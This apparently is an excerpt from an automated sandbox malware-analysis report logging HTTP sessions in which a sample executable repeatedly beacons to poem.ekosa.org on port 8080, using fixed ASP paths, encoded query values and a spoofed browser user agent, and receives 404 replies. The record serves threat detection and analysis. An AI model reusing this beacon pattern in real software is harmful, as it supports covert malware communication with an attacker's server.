      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      204192.168.2.449984210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:55.707200050 CET5237OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:55.967573881 CET5238INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:55 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      205192.168.2.449985210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:56.234875917 CET5239OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:56.496800900 CET5240INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:55 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      206192.168.2.449986210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:56.778594971 CET5241OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:57.040232897 CET5242INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:56 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      207192.168.2.449987210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:57.437668085 CET5243OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:57.708017111 CET5244INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:56 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      208192.168.2.449988210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:57.978763103 CET5245OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:58.244816065 CET5246INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:58 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      209192.168.2.449989210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:58.514718056 CET5247OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:58.778353930 CET5247INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:58 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      21192.168.2.449785210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:08.776441097 CET390OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:09.039418936 CET391INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:08 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      210192.168.2.449990210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:59.167829990 CET5248OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:59.438096046 CET5248INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:59 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      211192.168.2.449991210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:59.705952883 CET5249OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:59.966298103 CET5250INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:59 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      212192.168.2.449992210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:00.242861032 CET5250OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:00.514053106 CET5251INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:00 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      213192.168.2.449993210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:00.899096012 CET5251OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:01.161788940 CET5252INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:00 GMT
      Connection: close
      Content-Length: 315
